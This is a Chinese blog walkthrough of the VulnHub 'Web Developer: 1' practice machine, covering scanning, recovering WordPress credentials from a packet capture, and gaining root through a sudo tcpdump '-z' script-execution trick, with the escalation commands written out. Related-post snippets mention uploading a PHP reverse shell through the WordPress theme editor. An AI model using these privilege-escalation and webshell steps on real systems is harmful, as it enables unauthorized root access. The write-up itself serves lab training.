vulnhub-Web Developer 1靶机

于 2024-10-06 13:33:44 发布
阅读量142 收藏 7
点赞数 1
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjSteve/article/details/142726144
版权

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

image-20240927105502127

靶机在192.168.114.129,扫描端口

image-20240927105531584

有网站服务,访问

image-20240927105614112

没什么东西,扫目录

image-20240927105857018

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

image-20240927110129801

这次多出来一个ipdata目录

image-20240927110151616

里面有个cap文件,下载

image-20240927110440782

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

image-20240927110929501

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

image-20240927113845080

根据sudo -l,我们可以运行tcpdump

image-20240927113925849

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

image-20240927114206130

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

image-20240927114407300

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

image-20240927114357740

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

生草工坊
关注
小白的靶机VulnHub-Web Developer
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
Vulnhub:WebDeveloper:1靶机
qq_43884092的博客
03-27 266
目录爆破发现ipdata目录,进入该目录发现一个流量包,下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码
No.29-VulnHub-Web Developer: 1-Walkthrough渗透学习
qq_34801745的博客
01-24 959
** VulnHub-Web Developer: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 靶机难度:初级(CTF) 靶机发布日期:2018年11月5日 靶机描述: Zico试图建立自己的网站,但在选择要使用的CMS时遇到了一些麻烦。在尝试了一些受欢迎的方法后,他决定建立自己的方法。那是个好主...
Vulnhub靶机WEB DEVELOPER: 1
所有文章均免费阅读,大家一起学习
07-04 308
然后浏览器访问http://192.168.233.140//wp-content/themes/twentysixteen/404.php。将主题背景改为Twenty Sixteen,点击select然后将404.php源码再次修改为反弹shell的代码。结果如下,可以看到发往/wordpress/wp-login.php的POST报文中携带了。用找到的用户名密码登录wordpress,登录成功。查看webdeveloper用户的sudo命令\。查看一下网站根目录下面的文件。发现开放的端口有22 80。
vulnhubWebDeveloper:1靶机
wbplife的博客
08-11 406
把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)直接把/usr/share/webshells/php/php-reverse-shell.php改一下$ip和$port,保存,并上传。找到其位置在/var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php。首先,输入如下命令查找php-reverse-shell.php的位置。
vulnhub - webdeveloper考点:(信息搜集&wireshark&wordpress漏洞&linux tcpdump提权)
冬萍子癸水
04-23 363
https://www.vulnhub.com/entry/web-developer-1,288/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了。。 nmap看到80,22 80当然是web里搜集信息,22要想到可能会ssh登录。。 进去看到是WordPress博客,要想到wpscan扫它,扫出了用户,不过没有太亮眼的其他发现。 dirbuster之类的扫目录,发现登录框。。...
Vulnhub靶机 web-developer writeup
xingjinhao123的博客
01-23 2356
下载地址:https://www.vulnhub.com/entry/web-developer-1,288​ 信息搜集 扫描IP地址 ​ 扫描开放的端口 ​ 80端口 发现有wordpress内容管理系统​ 列举目录 访问ipdata目录发现有analyze.cap下载下来看一下​ 在180这条数据流中发现了登录信息,用户名:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd​ 成功登录到后台​ getsh...
vulnhub靶场,WEB DEVELOPER: 1
kukudeshuo的博客
12-21 978
vulnhub靶场,WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
vulnhub靶场,WEB DEVELOPER:1——新手进阶2
m0_75051044的博客
01-25 1950
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式,使攻击机和靶机的网络连接一样。然后浏览器访问http://192.168.109.191//wp-content/themes/twentysixteen/404.php。发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)使用arp-scan -l扫描确定靶机ip,当然也可以用nmap和netdiscover。
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3182
每台都做一做,然后记录在博客里.供自己和大家一起学习.
获取靶机Web Developer 文件/root/flag.txt中flag
qq_49085383的博客
12-07 2604
实验四文章目录前言1、发现目标 ,找到WebDeveloper的IP地址2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况3、若目标主机提供了HTTP服务,尝试利用浏览器访问目录4、利用whatweb探测目标网站使用的CMS模板5、网络搜索wpscan,简要说明其功能。6、使用 Dirb 爆破网站目录7、浏览器访问该目录(路径),发现一个cap文件8、利用Wireshark分析该数据包9、利用上一步得到的信息进入网站后台10、利用该CMS存在的(插件Plugin)漏洞,获得账号密码利用文件管理插件
汽车车轮钢圈加工机_三维3D设计图纸.zip
10-05
汽车车轮钢圈加工机_三维3D设计图纸.zip
问题汇总_C语言、数据结构.docx
最新发布
10-05
问题汇总_C语言、数据结构.docx
河北中医药大学在辽宁2020-2024各专业最低录取分数及位次表.pdf
10-05
那些年,与你同分同位次的同学都去了哪里?全国各大学在辽宁2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
基于Java语言的CP-RPC框架设计源码
10-05
该项目为基于Java语言的CP-RPC框架设计源码,总计包含202个文件,其中Java源文件71个,XML配置文件46个,Java类文件38个,属性文件7个,Kotlin模块定义4个,Idea项目文件3个,Protobuf定义文件2个,Git忽略规则文件1个。
数据手册-DAC0832-datasheet.zip
10-05
数据手册-DAC0832-datasheet.zip
全自动仿手工饺子机_三维3D设计图纸.zip
10-05
全自动仿手工饺子机_三维3D设计图纸.zip
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值